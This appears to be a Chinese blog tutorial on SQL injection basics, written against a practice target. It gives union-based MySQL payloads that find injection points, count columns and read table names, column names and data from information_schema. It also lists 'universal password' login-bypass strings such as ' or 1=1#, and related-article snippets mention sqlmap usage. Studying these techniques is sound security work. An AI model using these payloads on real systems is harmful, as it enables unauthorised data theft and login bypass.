SQL注入的本质

最新推荐文章于 2023-05-06 09:11:18 发布
最新推荐文章于 2023-05-06 09:11:18 发布
阅读量1.5k 收藏 31
点赞数 7
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35688430/article/details/119146957
版权

SQL注入的本质

注入攻击的本质: 把用户输入的数据当做代码执行

两个关键条件:

第一个是用户能够控制输入

第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行

针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行

显错注入-联合查询(Mysql数据库)的基本流程

1623234067_60c0961324ec42331fc35.png!small?1623234067968

重要知识点: 通过系统自带库查询数据

通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库

其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

information_schema.tables存放表名和库名的对应

information_schema.columns存放字段名和表名的对应

注: 【information_schema.tables 实际上是选中information_schema库中的tables表】

显错注入靶场的做法

1.判断注入点

最古老的方法: and 1=1 页面正常 and 1=2 页面不正常

最简单的方法: 页面后面加’,看是否报错

好用的方法: 如果是数字型传参,可以尝试-1

例如: http://www.xxx.com/new.php?id=1 页面显示id=1的新闻

http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻

and 1=1 and 1=2 被拦截的可能性太高了

可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1

或者直接 or sleep(5)

2. 判断当前页面字段总数

and 1=1 order by 1,2,3,4,5……

3.判断显示位

and 1=2 union select 1,2,3,4,5,6,7……

4.查当前数据库

and 1=2 union select 1,2,database()

5.查表名

and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

6.查列名

and 1=2 union select 1,2,column_name from information_schema.columns where table_name=表名 and table_schema=database() limit 0,1

7.查字段内容

and 1=2 union select 1,字段名,字段名 from 表名 limit 0,1

注:函数GROUP_CONCAT将多行数据进行整合在一行输出

POST注入介绍

POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别

在真实的站点上,POST注入往往比GET注入要多的多

POST注入高危点

登录框

查询框

等各种和数据库有交互的框

最经典的POST注入——万能密码

’or 1=1#

’or 1=1–

最低0.47元/天 解锁文章
weixin_35688430
关注
  • 7
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
head 注入
晨辰.的博客
03-21 5449
Head 注入
’or 1=1# 初入SQL注入的万能语句
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&am...
SQL 注入漏洞详解
m0_60571990的博客
12-19 3725
SQL 注入漏洞详解
SQLMap
WX公众号-小白学安全
10-26 3675
概述 ​ SQLMap是一款开源、自动化的SQL注入漏洞检测工具,主要功能是扫描、发现并利用给定URL的SQL注入漏洞,能够检测动态页面中的get/post参数、cookie、http头、还可以查看数据、文件系统访问、甚至能够操作系统命令执行。 支持的数据库:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 检测方式:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入 基
SQL 注入式攻击的本质
09-11
SQL 注入式攻击,又是注入式攻击,没想到2008年这个老掉牙的东西又出来搅风搅雨
MySQL解决SQL注入的另类方法详解
09-10
SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句来获取、修改、删除数据库中的数据,甚至控制系统。在MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要...
SQL注入漏洞原理与防御.pdf
06-06
SQL注入漏洞的本质是把用户输入的数据当做代码来执行,违背了“数据与代码分离”的原则。 SQL注入漏洞有两个关键条件,理解这两个条件可以帮助我们理解并防御SQL注入漏洞: 用户能控制输入的内容 Web应用执行的代码...
SQLMAP工具详解
weixin_56218159的博客
06-02 6188
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
SQLmap学习笔记
weixin_51031096的博客
03-12 295
sqlmap学习笔记,有基础sqlmap探测流程
深入浅出SQL(Head First SQL) [第一部分 共两部分]
04-19
Head First SQL [第一部分 共两部分] Head First SQL [第一部分 共两部分]
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
SQLMAP简介及使用方式
最新发布
weixin_61862241的博客
05-06 9182
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
Sqlmap命令使用
一醉一休的博客
02-27 4152
Sqlmap基本命令使用,总结常用23条命令
Sqlmap -- POST注入
weixin_41489908的博客
07-07 2807
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
POST注入和HEAD注入
weixin_53026460的博客
09-27 1289
(一)POST注入和普通的注入(联合查询)是没有区别的,它只是根据传参方式不同来判断类型。(二)POST注入的核心在于框,有框就可以尝试下是否存在注入;(三)GET可以直接传递参数,POST更多是存在于框,因为框代表着交互点,像登录框、查询框等各种一般都是通过POST进行传参的,当然这句话也不是必然,我们举一个baidu的例子;像这样在URL栏可以看到的是GET传参;各种框,一般来说都是POST传参,但不绝对,比如上面的baidu首页的例子就不是POST传参;
sqlmap工具学习记
m0_70483044的博客
07-20 612
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
sqlmap sqlmap.py 功能简介
stock_tt的专栏
05-23 1409
sqlmap.py 功能简介。 非常好的数据库工具。ACCESS 不行。其他的非常好用。下面介绍一下主要功能。 如果你知道数据库地址,用户名,可以直接连接。 sqlmap.py  -d  这个目前我感觉优势不大。最主要的是下面的功能。注入查询,和shell .注入:     支持一下几种注入。 盲注。  time based blind ,e
SQL注入详解:概念、工具与防御策略
"该资源为一个关于SQL注入的PPT介绍,主要涵盖了数据库基础、SQL注入的概念、利用...理解SQL注入本质和防御机制对于保护Web应用程序的安全至关重要。开发者应时刻警惕此类攻击,采取有效的预防措施,确保数据安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值